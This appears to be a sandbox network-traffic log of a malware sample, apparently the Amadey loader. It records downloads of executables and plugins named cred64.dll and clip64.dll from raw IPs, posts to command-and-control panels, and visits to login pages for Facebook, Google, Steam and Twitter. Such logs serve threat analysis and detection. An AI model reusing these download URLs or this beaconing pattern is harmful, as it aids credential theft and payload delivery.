alt-svc: h3=":443"; ma=86400
GET

http://185.196.9.171/Amadey.exe

Remote address:

185.196.9.171:80

Request

GET /Amadey.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 185.196.9.171

Response

HTTP/1.1 200 OK

Date: Fri, 03 Nov 2023 04:50:05 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
Last-Modified: Wed, 01 Nov 2023 15:45:10 GMT
ETag: "4ca00-60919280b857d"
Accept-Ranges: bytes
Content-Length: 313856
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
DNS

93.234.251.148.in-addr.arpa

Remote address:

8.8.8.8:53

Request

93.234.251.148.in-addr.arpa

IN PTR

Response

93.234.251.148.in-addr.arpa

IN PTR

iploggercom
DNS

0.96.114.188.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.96.114.188.in-addr.arpa

IN PTR

Response
DNS

171.9.196.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.9.196.185.in-addr.arpa

IN PTR

Response
POST

http://194.49.94.11/

Remote address:

194.49.94.11:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Host: 194.49.94.11
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Length: 212
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 03 Nov 2023 04:50:07 GMT
POST

http://194.49.94.11/

Remote address:

194.49.94.11:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
Host: 194.49.94.11
Content-Length: 144
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 4744
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 03 Nov 2023 04:50:12 GMT
POST

http://194.49.94.11/

Remote address:

194.49.94.11:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
Host: 194.49.94.11
Content-Length: 3823556
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 147
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 03 Nov 2023 04:50:38 GMT
POST

http://194.49.94.11/

Remote address:

194.49.94.11:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
Host: 194.49.94.11
Content-Length: 3823548
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 261
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 03 Nov 2023 04:50:40 GMT
DNS

11.94.49.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.94.49.194.in-addr.arpa

IN PTR

Response
DNS

t.paypal.com

Remote address:

8.8.8.8:53

Request

t.paypal.com

IN A

Response

t.paypal.com

IN CNAME

t.glb.paypal.com

t.glb.paypal.com

IN CNAME

paypal-dynamic-2.map.fastly.net

paypal-dynamic-2.map.fastly.net

IN A

151.101.1.35

paypal-dynamic-2.map.fastly.net

IN A

151.101.65.35

paypal-dynamic-2.map.fastly.net

IN A

151.101.129.35

paypal-dynamic-2.map.fastly.net

IN A

151.101.193.35
DNS

35.1.101.151.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.1.101.151.in-addr.arpa

IN PTR

Response
DNS

2.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

2.159.190.20.in-addr.arpa

IN PTR

Response
DNS

api.ip.sb

Remote address:

8.8.8.8:53

Request

api.ip.sb

IN A

Response

api.ip.sb

IN CNAME

api.ip.sb.cdn.cloudflare.net

api.ip.sb.cdn.cloudflare.net

IN A

104.26.13.31

api.ip.sb.cdn.cloudflare.net

IN A

104.26.12.31

api.ip.sb.cdn.cloudflare.net

IN A

172.67.75.172
POST

http://167.235.20.126/bjdm32DP/index.php?scr=1

Remote address:

167.235.20.126:80

Request

POST /bjdm32DP/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----ODY4OTk=
Host: 167.235.20.126
Content-Length: 87051
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Nov 2023 04:50:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://167.235.20.126/bjdm32DP/Plugins/cred64.dll

Remote address:

167.235.20.126:80

Request

GET /bjdm32DP/Plugins/cred64.dll HTTP/1.1
Host: 167.235.20.126

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Nov 2023 04:50:19 GMT
Content-Type: application/octet-stream
Content-Length: 1257984
Last-Modified: Sat, 28 Oct 2023 16:25:22 GMT
Connection: keep-alive
ETag: "653d35f2-133200"
Accept-Ranges: bytes
GET

http://167.235.20.126/bjdm32DP/Plugins/clip64.dll

Remote address:

167.235.20.126:80

Request

GET /bjdm32DP/Plugins/clip64.dll HTTP/1.1
Host: 167.235.20.126

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Nov 2023 04:50:30 GMT
Content-Type: application/octet-stream
Content-Length: 104448
Last-Modified: Sat, 28 Oct 2023 16:25:22 GMT
Connection: keep-alive
ETag: "653d35f2-19800"
Accept-Ranges: bytes
POST

http://167.235.20.126/bjdm32DP/index.php

Remote address:

167.235.20.126:80

Request

POST /bjdm32DP/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 167.235.20.126
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Nov 2023 04:50:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://167.235.20.126/bjdm32DP/index.php

Remote address:

167.235.20.126:80

Request

POST /bjdm32DP/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 167.235.20.126
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Nov 2023 04:50:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

126.20.235.167.in-addr.arpa

Remote address:

8.8.8.8:53

Request

126.20.235.167.in-addr.arpa

IN PTR

Response

126.20.235.167.in-addr.arpa

IN PTR

static12620235167clientsyour-serverde
DNS

31.13.26.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

31.13.26.104.in-addr.arpa

IN PTR

Response
DNS

watson.telemetry.microsoft.com

Remote address:

8.8.8.8:53

Request

watson.telemetry.microsoft.com

IN A

Response

watson.telemetry.microsoft.com

IN CNAME

blobcollector.events.data.trafficmanager.net

blobcollector.events.data.trafficmanager.net

IN CNAME

onedsblobprdwus15.westus.cloudapp.azure.com

onedsblobprdwus15.westus.cloudapp.azure.com

IN A

20.189.173.20
DNS

20.173.189.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

20.173.189.20.in-addr.arpa

IN PTR

Response
DNS

store.steampowered.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

store.steampowered.com

IN A

Response

store.steampowered.com

IN A

104.85.0.101
DNS

steamcommunity.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

steamcommunity.com

IN A

Response

steamcommunity.com

IN A

23.207.106.113
DNS

www.recaptcha.net

Remote address:

8.8.8.8:53

Request

www.recaptcha.net

IN A

Response

www.recaptcha.net

IN A

142.250.179.163
DNS

c.paypal.com

Remote address:

8.8.8.8:53

Request

c.paypal.com

IN A

Response

c.paypal.com

IN CNAME

www.glb.paypal.com

www.glb.paypal.com

IN CNAME

paypal-dynamic.map.fastly.net

paypal-dynamic.map.fastly.net

IN A

151.101.1.21

paypal-dynamic.map.fastly.net

IN A

151.101.65.21

paypal-dynamic.map.fastly.net

IN A

151.101.129.21

paypal-dynamic.map.fastly.net

IN A

151.101.193.21
DNS

14.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.227.111.52.in-addr.arpa

IN PTR

Response
DNS

api.steampowered.com

Remote address:

8.8.8.8:53

Request

api.steampowered.com

IN A

Response

api.steampowered.com

IN A

23.207.106.113
POST

http://167.235.20.126/bjdm32DP/index.php

Remote address:

167.235.20.126:80

Request

POST /bjdm32DP/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 167.235.20.126
Content-Length: 5
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Nov 2023 04:50:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://167.235.20.126/bjdm32DP/index.php

Remote address:

167.235.20.126:80

Request

POST /bjdm32DP/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 167.235.20.126
Content-Length: 21
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Nov 2023 04:50:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
DNS

b.stats.paypal.com

Remote address:

8.8.8.8:53

Request

b.stats.paypal.com

IN A

Response

b.stats.paypal.com

IN CNAME

stats.glb.paypal.com

stats.glb.paypal.com

IN A

64.4.245.84
DNS

84.245.4.64.in-addr.arpa

Remote address:

8.8.8.8:53

Request

84.245.4.64.in-addr.arpa

IN PTR

Response
DNS

195.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.179.250.142.in-addr.arpa

IN PTR

Response

195.179.250.142.in-addr.arpa

IN PTR

ams15s42-in-f31e100net
DNS

talon-website-prod.ecosec.on.epicgames.com

Remote address:

8.8.8.8:53

Request

talon-website-prod.ecosec.on.epicgames.com

IN A

Response

talon-website-prod.ecosec.on.epicgames.com

IN CNAME

talon-website-prod.ecosec.on.epicgames.com.cdn.cloudflare.net

talon-website-prod.ecosec.on.epicgames.com.cdn.cloudflare.net

IN A

172.64.146.120

talon-website-prod.ecosec.on.epicgames.com.cdn.cloudflare.net

IN A

104.18.41.136
DNS

watson.telemetry.microsoft.com

Remote address:

8.8.8.8:53

Request

watson.telemetry.microsoft.com

IN A

Response

watson.telemetry.microsoft.com

IN CNAME

blobcollector.events.data.trafficmanager.net

blobcollector.events.data.trafficmanager.net

IN CNAME

onedsblobprdwus15.westus.cloudapp.azure.com

onedsblobprdwus15.westus.cloudapp.azure.com

IN A

20.189.173.20
DNS

120.146.64.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

120.146.64.172.in-addr.arpa

IN PTR

Response
DNS

dub.stats.paypal.com

Remote address:

8.8.8.8:53

Request

dub.stats.paypal.com

IN A

Response

dub.stats.paypal.com

IN A

64.4.245.84
DNS

c6.paypal.com

Remote address:

8.8.8.8:53

Request

c6.paypal.com

IN A

Response

c6.paypal.com

IN CNAME

c6.glb.paypal.com

c6.glb.paypal.com

IN CNAME

dualstack.paypal-dynamic-2.map.fastly.net

dualstack.paypal-dynamic-2.map.fastly.net

IN A

151.101.1.35

dualstack.paypal-dynamic-2.map.fastly.net

IN A

151.101.65.35

dualstack.paypal-dynamic-2.map.fastly.net

IN A

151.101.129.35

dualstack.paypal-dynamic-2.map.fastly.net

IN A

151.101.193.35
DNS

131.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

131.179.250.142.in-addr.arpa

IN PTR

Response

131.179.250.142.in-addr.arpa

IN PTR

ams17s10-in-f31e100net
DNS

talon-service-prod.ecosec.on.epicgames.com

Remote address:

8.8.8.8:53

Request

talon-service-prod.ecosec.on.epicgames.com

IN A

Response

talon-service-prod.ecosec.on.epicgames.com

IN CNAME

talon-service-prod.ecosec.on.epicgames.com.cdn.cloudflare.net

talon-service-prod.ecosec.on.epicgames.com.cdn.cloudflare.net

IN A

172.64.146.120

talon-service-prod.ecosec.on.epicgames.com.cdn.cloudflare.net

IN A

104.18.41.136
DNS

js.hcaptcha.com

Remote address:

8.8.8.8:53

Request

js.hcaptcha.com

IN A

Response

js.hcaptcha.com

IN A

104.19.219.90

js.hcaptcha.com

IN A

104.19.218.90
DNS

90.219.19.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

90.219.19.104.in-addr.arpa

IN PTR

Response
DNS

newassets.hcaptcha.com

Remote address:

8.8.8.8:53

Request

newassets.hcaptcha.com

IN A

Response

newassets.hcaptcha.com

IN A

104.19.218.90

newassets.hcaptcha.com

IN A

104.19.219.90
DNS

host-file-host6.com

Remote address:

8.8.8.8:53

Request

host-file-host6.com

IN A

Response
DNS

host-host-file8.com

Remote address:

8.8.8.8:53

Request

host-host-file8.com

IN A

Response

host-host-file8.com

IN A

95.214.26.28
DNS

90.218.19.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

90.218.19.104.in-addr.arpa

IN PTR

Response
POST

http://host-host-file8.com/

Remote address:

95.214.26.28:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://tbskt.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 192
Host: host-host-file8.com

Response

HTTP/1.1 200 OK

Server: nginx/1.20.2
Date: Fri, 03 Nov 2023 04:50:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
DNS

161.19.199.152.in-addr.arpa

Remote address:

8.8.8.8:53

Request

161.19.199.152.in-addr.arpa

IN PTR

Response
DNS

28.26.214.95.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.26.214.95.in-addr.arpa

IN PTR

Response
DNS

hcaptcha.com

Remote address:

8.8.8.8:53

Request

hcaptcha.com

IN A

Response

hcaptcha.com

IN A

104.19.218.90

hcaptcha.com

IN A

104.19.219.90
DNS

200.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.197.79.204.in-addr.arpa

IN PTR

Response

200.197.79.204.in-addr.arpa

IN PTR

a-0001a-msedgenet
DNS

2.173.189.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

2.173.189.20.in-addr.arpa

IN PTR

Response
DNS

163.252.72.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

163.252.72.23.in-addr.arpa

IN PTR

Response

163.252.72.23.in-addr.arpa

IN PTR

a23-72-252-163deploystaticakamaitechnologiescom
DNS

i.ytimg.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

i.ytimg.com

IN A

Response

i.ytimg.com

IN A

142.251.36.54

i.ytimg.com

IN A

172.217.168.246

i.ytimg.com

IN A

142.250.179.182

i.ytimg.com

IN A

142.250.179.214

i.ytimg.com

IN A

142.251.36.22

i.ytimg.com

IN A

142.251.39.118

i.ytimg.com

IN A

172.217.168.214

i.ytimg.com

IN A

172.217.23.214

i.ytimg.com

IN A

216.58.208.118

i.ytimg.com

IN A

142.250.179.150
DNS

accounts.google.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN A

Response

accounts.google.com

IN A

142.251.36.45
DNS

watson.telemetry.microsoft.com

Remote address:

8.8.8.8:53

Request

watson.telemetry.microsoft.com

IN A

Response

watson.telemetry.microsoft.com

IN CNAME

blobcollector.events.data.trafficmanager.net

blobcollector.events.data.trafficmanager.net

IN CNAME

onedsblobprdwus17.westus.cloudapp.azure.com

onedsblobprdwus17.westus.cloudapp.azure.com

IN A

20.189.173.22
DNS

22.173.189.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.173.189.20.in-addr.arpa

IN PTR

Response
DNS

196.168.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.168.217.172.in-addr.arpa

IN PTR

Response

196.168.217.172.in-addr.arpa

IN PTR

ams16s32-in-f41e100net
DNS

183.2.85.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

183.2.85.104.in-addr.arpa

IN PTR

Response

183.2.85.104.in-addr.arpa

IN PTR

a104-85-2-183deploystaticakamaitechnologiescom
DNS

www.microsoft.com

Remote address:

8.8.8.8:53

Request

www.microsoft.com

IN A

Response

www.microsoft.com

IN CNAME

www.microsoft.com-c-3.edgekey.net

www.microsoft.com-c-3.edgekey.net

IN CNAME

www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net

www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net

IN CNAME

e13678.dscb.akamaiedge.net

e13678.dscb.akamaiedge.net

IN A

104.85.1.163

77.91.68.29:80

http://77.91.68.29/fks/

http

90.9kB
2.0MB
1435
1457

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
77.91.68.249:80

http://77.91.68.249/fuza/3.bat

http

436 B
857 B
6
5

HTTP Request

GET http://77.91.68.249/fuza/3.bat

HTTP Response

200
193.233.255.73:80

http://193.233.255.73/loghub/master

http

F733.exe

755 B
436 B
6
4

HTTP Request

POST http://193.233.255.73/loghub/master

HTTP Response

200
5.42.65.80:80

http://5.42.65.80/latestrock.exe

http

291.0kB
13.3MB
5462
9960

HTTP Request

GET http://5.42.65.80/latestrock.exe

HTTP Response

200
77.91.124.86:19084

2kY317Xn.exe

156 B
3
77.91.124.86:19084

F84D.exe

156 B
3
157.240.247.35:443

www.facebook.com

tls, http2

MicrosoftEdgeCP.exe

1.2kB
3.9kB
16
12
157.240.247.35:443

https://www.facebook.com/ajax/bz?__a=1&__aaid=0&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zK1swc-0lK3qaw4kwbS1Lw4Cwcq&__hs=19664.BP%3ADEFAULT.2.0..0.0&__hsi=7297093542137434357&__req=4&__rev=1009667778&__s=%3A%3A33ib9c&__spin_b=trunk&__spin_r=1009667778&__spin_t=1698986986&__user=0&dpr=1&jazoest=21030&lsd=AVrHoFl_hxU

tls, http2

MicrosoftEdgeCP.exe

27.5kB
329.0kB
287
267

HTTP Request

GET https://www.facebook.com/login

HTTP Response

200

HTTP Request

GET https://www.facebook.com/images/cookies/cookie_info_card_image_1.png

HTTP Response

200

HTTP Request

GET https://www.facebook.com/images/cookies/cookie_info_card_image_2.png

HTTP Response

200

HTTP Request

GET https://www.facebook.com/images/cookies/cookie_info_card_image_3.png

HTTP Request

GET https://www.facebook.com/images/cookies/cookie_info_card_image_4.png

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.facebook.com/images/cookies/cookie_info_popup_image_1.png

HTTP Request

GET https://www.facebook.com/images/cookies/cookie_info_popup_image_2.png

HTTP Request

GET https://www.facebook.com/images/cookies/cookie_info_popup_image_3.png

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.facebook.com/images/cookies/cookie_info_popup_image_4.png

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://www.facebook.com/ajax/bz?__a=1&__aaid=0&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zK1swc-0lK3qaw4kwbS1Lw4Cwcq&__hs=19664.BP%3ADEFAULT.2.0..0.0&__hsi=7297093542137434357&__req=1&__rev=1009667778&__s=%3A%3A33ib9c&__spin_b=trunk&__spin_r=1009667778&__spin_t=1698986986&__user=0&dpr=1&jazoest=21030&lsd=AVrHoFl_hxU

HTTP Response

200

HTTP Request

POST https://www.facebook.com/ajax/bz?__a=1&__aaid=0&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zK1swc-0lK3qaw4kwbS1Lw4Cwcq&__hs=19664.BP%3ADEFAULT.2.0..0.0&__hsi=7297093542137434357&__req=2&__rev=1009667778&__s=%3A%3A33ib9c&__spin_b=trunk&__spin_r=1009667778&__spin_t=1698986986&__user=0&dpr=1&jazoest=21030&lsd=AVrHoFl_hxU

HTTP Response

200

HTTP Request

POST https://www.facebook.com/ajax/bz?__a=1&__aaid=0&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zK1swc-0lK3qaw4kwbS1Lw4Cwcq&__hs=19664.BP%3ADEFAULT.2.0..0.0&__hsi=7297093542137434357&__req=3&__rev=1009667778&__s=%3A%3A33ib9c&__spin_b=trunk&__spin_r=1009667778&__spin_t=1698986986&__user=0&dpr=1&jazoest=21030&lsd=AVrHoFl_hxU

HTTP Response

200

HTTP Request

POST https://www.facebook.com/ajax/bz?__a=1&__aaid=0&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zK1swc-0lK3qaw4kwbS1Lw4Cwcq&__hs=19664.BP%3ADEFAULT.2.0..0.0&__hsi=7297093542137434357&__req=4&__rev=1009667778&__s=%3A%3A33ib9c&__spin_b=trunk&__spin_r=1009667778&__spin_t=1698986986&__user=0&dpr=1&jazoest=21030&lsd=AVrHoFl_hxU

HTTP Response

200
142.251.36.45:443

https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyyL8rBsF7ahukjmZT6G8haiivnujMEGE_uFAcIdn3ziW-iMZtmjf9UvDX1uwO2dE9v44VrnJg&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1593708161%3A1698986988785094&theme=glif

tls, http2

MicrosoftEdgeCP.exe

6.8kB
123.6kB
117
113

HTTP Request

GET https://accounts.google.com/

HTTP Response

302

HTTP Request

GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

HTTP Response

302

HTTP Request

GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AVQVeyxr4nqzflxMucHAYpg8g-BtrkxjGY15MEN3hEwhMJUUS4NO8awXHIJybptFC9_v60r-I-dobQ

HTTP Response

302

HTTP Request

GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyyL8rBsF7ahukjmZT6G8haiivnujMEGE_uFAcIdn3ziW-iMZtmjf9UvDX1uwO2dE9v44VrnJg&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1593708161%3A1698986988785094&theme=glif

HTTP Response

200
142.251.36.45:443

accounts.google.com

tls, http2

MicrosoftEdgeCP.exe

1.1kB
5.1kB
14
10
104.244.42.129:443

twitter.com

tls, http2

MicrosoftEdgeCP.exe

1.0kB
4.2kB
14
10
104.244.42.129:443

https://twitter.com/i/flow/login

tls, http2

MicrosoftEdgeCP.exe

1.4kB
5.7kB
17
13

HTTP Request

GET https://twitter.com/i/flow/login

HTTP Response

400
104.85.0.101:443

https://store.steampowered.com/login/

tls, http

MicrosoftEdgeCP.exe

1.6kB
12.2kB
20
18

HTTP Request

GET https://store.steampowered.com/login/

HTTP Response

200
104.85.0.101:443

store.steampowered.com

tls

MicrosoftEdgeCP.exe

939 B
4.4kB
13
10
157.240.5.10:443

https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/Y0L6f5sxdIV.png

tls, http2

MicrosoftEdgeCP.exe

27.2kB
428.4kB
478
427

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yF/l/0,cross/tlYVHfcv8SI.css?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yt/l/0,cross/_Spr5Be9x5O.css?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0,cross/EfoYxebGYR7.css?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yD/l/0,cross/pN9tJT8IYyK.css?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yS/l/0,cross/2vQr9XaGVSF.css?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/y2/l/0,cross/fhrZ5QrtjNj.css?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yO/l/0,cross/iZvscNuQFSs.css?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yx/l/0,cross/7O04Eyj-1fg.css?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yU/r/EhJ0QrY2FBP.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yp/r/gC0mb5XShS_.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yt/r/v75M7CPu9-P.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yz/r/fiUTTh4d_Lr.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3i7M54/yy/l/en_US/fVsT0Ugl-s1.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yT/r/0ZOQmhGCKxB.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/y8/l/0,cross/GkniLnsECe7.css?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/y7/l/0,cross/L9qs_fzO9uB.css?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yx/l/0,cross/JP2GMn4f0fs.css?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yU/r/O7nelmd9XSI.png

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yz/r/1jo5ZChBkzZ.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yJ/r/a1OLcVhluEP.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yt/r/d4QqVJOdC1V.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yc/r/pD68cOkOMec.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/y9/r/bG0oiWXQIFv.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yt/r/waLvPG4m_lK.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yv/r/N9t1W9oe3ma.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yz/r/lFK_RCKM9IT.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yF/r/p55HfXW__mM.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/y0/r/bad2R-_Mb01.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

